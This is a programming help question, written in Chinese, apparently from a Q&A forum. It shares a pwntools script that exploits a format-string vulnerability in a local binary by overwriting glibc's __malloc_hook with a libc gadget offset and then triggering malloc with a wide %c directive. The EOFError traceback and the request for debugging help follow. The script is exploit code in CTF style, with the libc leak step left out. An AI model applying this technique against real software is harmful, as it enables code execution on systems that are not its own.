我想借助 pwntools,通过覆盖 malloc_hook 来利用一个格式化字符串漏洞,所以我写了以下脚本:
# NOTE(review): context, ELF, process and FmtStr are pwntools names; the import
# line is not part of this excerpt (presumably `from pwn import *` — confirm).

# Target architecture used by pwntools when it packs addresses and builds payloads.
context.arch = "amd64"
# Parse the local target binary from the working directory.
elf = ELF("./format")
# The libc object that pwntools associates with the target binary.
libc = elf.libc
# Start the target as a local child process; `p` is the tube that send_recv and
# main talk to.
p = process("./format")
def send_recv(payload):
    """Send one payload line to the target and return the next line it prints.

    Passed to ``FmtStr`` as its ``execute_fmt`` callback, so the library calls
    it once per payload it wants delivered.

    Raises:
        EOFError: propagated from ``recvline`` when the process closes its
            output (for example because it exited) before a complete line
            has been received.
    """
    p.sendline(payload)
    return p.recvline()
def main():
    """Write a computed libc address over ``__malloc_hook`` via ``FmtStr``.

    The value written is ``libc.address + 0xe6c84``. The write is queued with
    ``FmtStr.write`` and delivered by ``execute_writes``, which hands the
    generated payload to ``send_recv``; afterwards one more line containing a
    ``%c`` directive with a field width of 65580 is sent to the process.

    NOTE: ``send_recv`` waits for a reply line after every payload, so
    ``execute_writes`` raises EOFError if the target stops producing output
    once it has received the payload.
    NOTE: glibc 2.34 and later no longer call ``__malloc_hook``, so this write
    target only has an effect on older libc builds.
    """
    # (elided in the original post) some address calculations such as libc leaks
    # 0xe6c84 is an offset into the loaded libc; it is only valid for the
    # exact libc build the author was working with.
    hook_value = libc.address + 0xe6c84
    writer = FmtStr(execute_fmt=send_recv)
    writer.write(libc.symbols['__malloc_hook'], hook_value)
    writer.execute_writes()
    p.sendline("%65580c")
当我运行脚本时,我收到以下错误:
File "script.py", line 47, in <module>
main()
File "script.py", line 40, in main
fmt.execute_writes()
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/fmtstr.py", line 906, in execute_writes
self.execute_fmt(fmtstr)
File "script.py", line 11, in send_recv
val = p.recvline()
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 490, in recvline
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 333, in recvuntil
res = self.recv(timeout=self.timeout)
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 105, in recv
return self._recv(numb, timeout) or b''
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 183, in _recv
if not self.buffer and not self._fillbuffer(timeout):
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 154, in _fillbuffer
data = self.recv_raw(self.buffer.get_fill_size())
File "/home/scorpion197/.local/lib/python3.8/site-packages/pwnlib/tubes/process.py", line 717, in recv_raw
raise EOFError
EOFError
有人能帮帮我吗?提前致谢。